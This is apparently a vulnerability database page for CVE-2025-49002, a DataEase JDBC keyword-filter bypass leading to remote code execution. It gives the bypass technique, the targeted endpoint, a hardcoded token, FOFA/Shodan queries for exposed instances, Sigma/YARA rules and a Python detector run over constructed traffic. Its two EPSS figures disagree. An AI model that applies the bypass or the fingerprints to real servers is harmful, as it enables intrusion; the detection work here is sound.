cbcvebase.
CVE-2025-49002
published 2025-06-03

CVE-2025-49002: DataEase is an open source business intelligence and data visualization tool. Versions prior to version 2.10.10 have a flaw in the patch for CVE-2025-32966…

Priority: P279
Severity: critical, 9.8 (CVSS 3.1)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EXPLOIT
EPSS: 41.84% (98.5th percentile)
DataEase is an open source business intelligence and data visualization tool. Versions prior to 2.10.10 have a flaw in the patch for CVE-2025-32966 that allows the patch to be bypassed through case insensitivity, because only the keywords INIT and RUNSCRIPT are prohibited. The vulnerability has been fixed in v2.10.10. No known workarounds are available.

Affected (1 range)

Vendor: dataease
Product: dataease
Version range: < 2.10.10
Fixed in: 2.10.10

Detection & IOCs (extracted from sources)

url: POST /de2api/datasource/getSchema HTTP/1.1
path: /de2api/datasource/getSchema
cookie: X-DE-TOKEN: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1aWQiOjEsIm9pZCI6MX0.a5QYOfZDYlhAy-zUMYzKBBvCUs1ogZhjwKV5SBTECt8
sigma:
    detection:
      keywords:
        - 'Exception calling'
        - 'exec():'
      condition: all of them
yara:
    rule CVE_2025_49002_DataEase_RCE {
        strings:
            $uid = /uid=[0-9]+.*gid=[0-9]+.*/
        condition:
            $uid
    }
  • Exploit targets the POST /de2api/datasource/getSchema endpoint with a crafted H2 JDBC URL in the 'configuration' field (base64-encoded JSON) using mixed-case bypass of blocked keywords (e.g., 'in\it' instead of 'INIT', 'CREAT\E' instead of 'CREATE') to achieve RCE via H2 JDBC INIT parameter.
  • Successful exploitation is confirmed in the HTTP response body by the presence of both 'Exception calling' and 'exec():' strings, along with a Unix uid/gid output pattern matching uid=[0-9]+.*gid=[0-9]+.*, and HTTP 200 with Content-Type application/json.
  • The attacker supplies a hardcoded JWT token in the X-DE-TOKEN header (eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1aWQiOjEsIm9pZCI6MX0.a5QYOfZDYlhAy-zUMYzKBBvCUs1ogZhjwKV5SBTECt8) — monitor for this specific token value in HTTP request headers as a strong exploitation indicator.
  • FOFA and Shodan fingerprints for exposed DataEase instances: FOFA query app="FIT2CLOUD-DataEase"; Shodan query http.html:"DataEase".
  • The bypass works by obfuscating the H2 JDBC INIT keyword using backslash-insertion (in\it) and mixed-case (CREAT\E) to evade the blocklist that only prohibits exact-case 'INIT' and 'RUNSCRIPT'.
  • The Nuclei template is described as non-invasive and does NOT attempt authentication bypass, JDBC exploitation, or command execution; it only checks for exposed instances and version hints. The embedded payload in the template body is for reference/detection matching only.
  • No known workarounds are available for CVE-2025-49002; the only fix is upgrading to DataEase v2.10.10 or later.
  • The EPSS score is 0.26173 (96.31st percentile), indicating a high likelihood of exploitation in the wild relative to other CVEs.
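As an added example (not part of this record and not DataEase project code), the following Python turns the detection material above (the Sigma keywords, the YARA uid/gid regex, the targeted endpoint and the hardcoded X-DE-TOKEN value) into a checker that can be run over proxy or WAF captures of request/response pairs. The sample requests and responses are constructed for the example; the payload in the request body is deliberately omitted, since only the response markers and the token value are needed to classify the traffic.

```python
import re

# Indicators as listed on this page for CVE-2025-49002: the targeted endpoint,
# the hardcoded JWT seen in the X-DE-TOKEN header, the Sigma keywords (all of
# them must be present) and the YARA uid/gid regex.
TARGET_PATH = "/de2api/datasource/getSchema"
HARDCODED_TOKEN = (
    "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9."
    "eyJ1aWQiOjEsIm9pZCI6MX0.a5QYOfZDYlhAy-zUMYzKBBvCUs1ogZhjwKV5SBTECt8"
)
RESPONSE_KEYWORDS = ("Exception calling", "exec():")  # Sigma: condition "all of them"
UID_GID_RE = re.compile(r"uid=[0-9]+.*gid=[0-9]+.*")  # YARA: $uid


def parse_http_request(raw):
    """Split a raw HTTP/1.1 request (as a proxy would log it) into method, target
    and a dict of headers with lower-cased names; the body is not needed here."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return method, target, headers


def request_indicators(raw_request):
    """Request-side indicators. The endpoint alone is ordinary product usage and is
    only informational; the hardcoded token is the strong indicator."""
    method, target, headers = parse_http_request(raw_request)
    hits = []
    if method == "POST" and target.split("?", 1)[0] == TARGET_PATH:
        hits.append("getSchema_post")
    if headers.get("x-de-token") == HARDCODED_TOKEN:
        hits.append("hardcoded_jwt")
    return hits


def response_indicators(status, content_type, body):
    """Response-side indicators mirroring the Sigma and YARA rules, plus the
    HTTP 200 / application/json condition the page lists for a successful run."""
    hits = []
    if all(k in body for k in RESPONSE_KEYWORDS):
        hits.append("sigma_exception_exec")
    if UID_GID_RE.search(body):
        hits.append("yara_uid_gid")
    if hits and status == 200 and content_type.split(";")[0].strip() == "application/json":
        hits.append("http200_json")
    return hits


def classify(raw_request, status, content_type, body):
    """Combine both sides into a verdict string and the list of indicators that fired."""
    req = request_indicators(raw_request)
    res = response_indicators(status, content_type, body)
    if "sigma_exception_exec" in res and "yara_uid_gid" in res:
        return "likely_successful_exploitation", req + res
    if "hardcoded_jwt" in req:
        return "exploitation_attempt", req + res
    if "getSchema_post" in req:
        return "getSchema_usage", req + res
    return "no_indicators", req + res


# Constructed sample traffic (not real captures). Request bodies omit any datasource
# configuration; only headers and response text matter for the checks above.
BENIGN_REQ = (
    "POST /de2api/datasource/getSchema HTTP/1.1\r\n"
    "Host: bi.example.internal\r\n"
    "Content-Type: application/json\r\n"
    "X-DE-TOKEN: eyJ.constructed-benign-session-token.sig\r\n"
    "\r\n"
    '{"type":"mysql","configuration":"<omitted>"}'
)
ATTEMPT_REQ = (
    "POST /de2api/datasource/getSchema HTTP/1.1\r\n"
    "Host: bi.example.internal\r\n"
    "Content-Type: application/json\r\n"
    "X-DE-TOKEN: " + HARDCODED_TOKEN + "\r\n"
    "\r\n"
    '{"type":"h2","configuration":"<omitted>"}'
)
BENIGN_BODY = '{"code":0,"msg":null,"data":["public"]}'
ATTEMPT_BODY = '{"code":500,"msg":"Connection refused","data":null}'
SUCCESS_BODY = (
    '{"code":500,"msg":"Exception calling \\"exec():\\" '
    'uid=1000(deuser) gid=1000(deuser) groups=1000(deuser)","data":null}'
)


def analyze_samples():
    """Run the classifier over the three constructed pairs; returns name -> verdict."""
    pairs = {
        "benign": (BENIGN_REQ, 200, "application/json", BENIGN_BODY),
        "attempt": (ATTEMPT_REQ, 200, "application/json", ATTEMPT_BODY),
        "success": (ATTEMPT_REQ, 200, "application/json;charset=UTF-8", SUCCESS_BODY),
    }
    return {name: classify(*args)[0] for name, args in pairs.items()}


if __name__ == "__main__":
    for name, verdict in analyze_samples().items():
        print(f"{name}: {verdict}")
```

The request-only signal (a POST to getSchema) is deliberately ranked lowest, because that endpoint is used by every legitimate datasource test; the token value and the paired response markers are what separate an exploitation attempt and a successful one from normal traffic.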

CVSS provenance

NVD, CVSS v3.1: 9.8 CRITICAL
    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
NVD, CVSS v4.0: 8.2 HIGH
    CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X